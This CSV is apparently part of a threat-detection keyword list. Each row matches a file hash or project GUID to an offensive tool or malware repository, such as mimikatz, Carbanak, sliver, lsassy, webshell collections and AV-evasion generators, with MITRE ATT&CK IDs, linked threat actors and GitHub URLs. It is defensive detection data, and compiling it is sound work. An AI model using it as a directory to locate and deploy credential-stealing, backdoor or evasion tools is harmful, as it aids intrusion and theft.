"*e7ccfa126c99f4c6836b28455b1dae4b5a85202d8212f340ef3f3d1785e47387*",".{0,1000}e7ccfa126c99f4c6836b28455b1dae4b5a85202d8212f340ef3f3d1785e47387.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42287"
"*e7ce68e94b4b3a3f8ba4e660edd00c794af6d158ce6f993d74d9732cfd83f2c7*",".{0,1000}e7ce68e94b4b3a3f8ba4e660edd00c794af6d158ce6f993d74d9732cfd83f2c7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","42288"
"*e7ce97b11adf6ae5bdf2893583c1de12d1459ced27c9a78cc12282ede35b924a*",".{0,1000}e7ce97b11adf6ae5bdf2893583c1de12d1459ced27c9a78cc12282ede35b924a.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42289"
"*e7d89d1f23c2c31e2cd188042436ce6d83dac571a5f30e76cbbcdfaf51e30ad9*",".{0,1000}e7d89d1f23c2c31e2cd188042436ce6d83dac571a5f30e76cbbcdfaf51e30ad9.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","42290"
"*e7e397ee350cadf7f2b49b85c440a340a090881e58e3238d266164b095a4a82d*",".{0,1000}e7e397ee350cadf7f2b49b85c440a340a090881e58e3238d266164b095a4a82d.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","42292"
"*e7eeba3b5fef6c4fb2bf4aa664ce87f13d5b15f288d4c1471c5c872d67ae87d8*",".{0,1000}e7eeba3b5fef6c4fb2bf4aa664ce87f13d5b15f288d4c1471c5c872d67ae87d8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42299"
"*E7F99164-F00F-4B2A-86A9-8EB5F659F34C*",".{0,1000}E7F99164\-F00F\-4B2A\-86A9\-8EB5F659F34C.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","42303"
"*e7fb74eb2170e30bf6650f9e5fc2c60f68f3532cee3e0309de503a19cd7647c6*",".{0,1000}e7fb74eb2170e30bf6650f9e5fc2c60f68f3532cee3e0309de503a19cd7647c6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42305"
"*e7fc34563fba238982ec178b82d38c2a182f3d5409a291a5a0ada363d5b292b0*",".{0,1000}e7fc34563fba238982ec178b82d38c2a182f3d5409a291a5a0ada363d5b292b0.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","42306"
"*e7fe93ae48f18878e1476a2aaaf46af6da778d2f3a33dfe27c8d18cc890e1e7c*",".{0,1000}e7fe93ae48f18878e1476a2aaaf46af6da778d2f3a33dfe27c8d18cc890e1e7c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42307"
"*e8037ba03db7ab77f623de243e19284af0dcc8e2d042e3bf7eba810066fae738*",".{0,1000}e8037ba03db7ab77f623de243e19284af0dcc8e2d042e3bf7eba810066fae738.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42309"
"*e803b7023dfdcb1d73de9a04be5222269b020ada4fcc97ca19ef877c55a51c28*",".{0,1000}e803b7023dfdcb1d73de9a04be5222269b020ada4fcc97ca19ef877c55a51c28.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","42310"
"*e804b4ea28a60c2491bf78265637e7759df5c2abcda02623f3b534a908064801*",".{0,1000}e804b4ea28a60c2491bf78265637e7759df5c2abcda02623f3b534a908064801.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42311"
"*e80bda100b7b75500bd6f4cc09e566e5467c784876bc01ba934ea8792daf8b11*",".{0,1000}e80bda100b7b75500bd6f4cc09e566e5467c784876bc01ba934ea8792daf8b11.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","42312"
"*e81284fcd76acab65fcb296db056f50a4fa61eb120581ff2d494006d97f2f762*",".{0,1000}e81284fcd76acab65fcb296db056f50a4fa61eb120581ff2d494006d97f2f762.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","#filehash","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","42314"
"*e8187f2863d067a0f07cec1d4c0b7150c1975334addfc58d3c742e7bd66f4a13*",".{0,1000}e8187f2863d067a0f07cec1d4c0b7150c1975334addfc58d3c742e7bd66f4a13.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42315"
"*e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98*",".{0,1000}e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42316"
"*e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98*",".{0,1000}e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42317"
"*e82a6a97f9239b0e6bd68c9ce795dc7ae29f6e008bfb8ab63f2dfe9e94817bea*",".{0,1000}e82a6a97f9239b0e6bd68c9ce795dc7ae29f6e008bfb8ab63f2dfe9e94817bea.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","42318"
"*e82a9d963a5752b034523b96ee1702ba733c83ca2f00bb3aa190254e8967646a*",".{0,1000}e82a9d963a5752b034523b96ee1702ba733c83ca2f00bb3aa190254e8967646a.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","42319"
"*E82BCAD1-0D2B-4E95-B382-933CF78A8128*",".{0,1000}E82BCAD1\-0D2B\-4E95\-B382\-933CF78A8128.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","#GUIDproject","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","42322"
"*E832E9B8-2158-4FC0-89A1-56C6ECC10F6B*",".{0,1000}E832E9B8\-2158\-4FC0\-89A1\-56C6ECC10F6B.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","42324"
"*e8336778c23574464fae2551b27074d52a949d7c97fe3fd0d8351f3f340e811b*",".{0,1000}e8336778c23574464fae2551b27074d52a949d7c97fe3fd0d8351f3f340e811b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42325"
"*e83713071664d8b6feeb9c942f05dca3ba4951ac55743dbaeb79933f4728967d*",".{0,1000}e83713071664d8b6feeb9c942f05dca3ba4951ac55743dbaeb79933f4728967d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42326"
"*e842c810b6ecb9c7634f1cfbf81b6245094528ac5584179eb8e6932eaa34f421*",".{0,1000}e842c810b6ecb9c7634f1cfbf81b6245094528ac5584179eb8e6932eaa34f421.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","42327"
"*e8467998e22a50d952a786c2ce337493cdd4d32a7e035a7af58bdc3c9b3f17ed*",".{0,1000}e8467998e22a50d952a786c2ce337493cdd4d32a7e035a7af58bdc3c9b3f17ed.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","42328"
"*e848c25347ea3027e46eb9825cc47f3e8eaf44c5aead6691d6ea61c27cd4b136*",".{0,1000}e848c25347ea3027e46eb9825cc47f3e8eaf44c5aead6691d6ea61c27cd4b136.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42329"
"*e8551730a864826e18b2283e7a5a24fababe9de86fa88974c4c5dafe314e079f*",".{0,1000}e8551730a864826e18b2283e7a5a24fababe9de86fa88974c4c5dafe314e079f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42333"
"*e86f3bf9daab62a33014d63811a020cab6ebb0570a8cea4496b1ee586ad6c5bd*",".{0,1000}e86f3bf9daab62a33014d63811a020cab6ebb0570a8cea4496b1ee586ad6c5bd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42335"
"*e87317b17ec11d9ccb88c88be71d293acf3ea497af1f5fca05a3292667962257*",".{0,1000}e87317b17ec11d9ccb88c88be71d293acf3ea497af1f5fca05a3292667962257.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42336"
"*e8764235881acc005589fc1d0e0dce61af095f9d1d6f122bf75fd8b95f4bb368*",".{0,1000}e8764235881acc005589fc1d0e0dce61af095f9d1d6f122bf75fd8b95f4bb368.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","42337"
"*e88262454c26daae342bea04507e03b8b49599d5fd2d5ec81027e685333a4104*",".{0,1000}e88262454c26daae342bea04507e03b8b49599d5fd2d5ec81027e685333a4104.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42338"
"*e8831136f2ddf051e2b1e127ff7ebec5351f9a5a33d80289343ddfee2fd1ff2e*",".{0,1000}e8831136f2ddf051e2b1e127ff7ebec5351f9a5a33d80289343ddfee2fd1ff2e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42339"
"*e888bdb98dec5ad0f33feec1ce1563987ae364a7d27da8a1676d763d1d04fbef*",".{0,1000}e888bdb98dec5ad0f33feec1ce1563987ae364a7d27da8a1676d763d1d04fbef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42340"
"*e8923c77fca2d26eed8cef702814542d9afaebe79797517b7a24b42effc7433a*",".{0,1000}e8923c77fca2d26eed8cef702814542d9afaebe79797517b7a24b42effc7433a.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","42341"
"*e8930c16d171577f55aa0cbdd8fe5fe656bba46751cd44e2e2fda325b6f6e9b9*",".{0,1000}e8930c16d171577f55aa0cbdd8fe5fe656bba46751cd44e2e2fda325b6f6e9b9.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","42342"
"*e8950dfc957d2323f55944075134ff945bb8c467e48c1b4b7c86725b09460da2*",".{0,1000}e8950dfc957d2323f55944075134ff945bb8c467e48c1b4b7c86725b09460da2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42343"
"*e897d08460dbb646108b17a32455d9be51487bee26b48dfef992b7f246d54f1d*",".{0,1000}e897d08460dbb646108b17a32455d9be51487bee26b48dfef992b7f246d54f1d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42345"
"*e8a017f717909f20e325d901af37d25b1e19e363923dfe61dfecae77d7d979ef*",".{0,1000}e8a017f717909f20e325d901af37d25b1e19e363923dfe61dfecae77d7d979ef.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","42347"
"*e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173*",".{0,1000}e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","42349"
"*e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173*",".{0,1000}e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","42350"
"*e8a6280ea27ebc3633c9976efa12a8b00b995e6234d03bbfd802fe118c713d1a*",".{0,1000}e8a6280ea27ebc3633c9976efa12a8b00b995e6234d03bbfd802fe118c713d1a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42351"
"*e8b23510668248699f0891fc9eafd8fb65e6dc77a21153731a492a74906ad3fc*",".{0,1000}e8b23510668248699f0891fc9eafd8fb65e6dc77a21153731a492a74906ad3fc.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42352"
"*e8b691790bf24db24c00083a78e42fa9bb87fbb7abd763ee5e415ad3f8e1979c*",".{0,1000}e8b691790bf24db24c00083a78e42fa9bb87fbb7abd763ee5e415ad3f8e1979c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","42354"
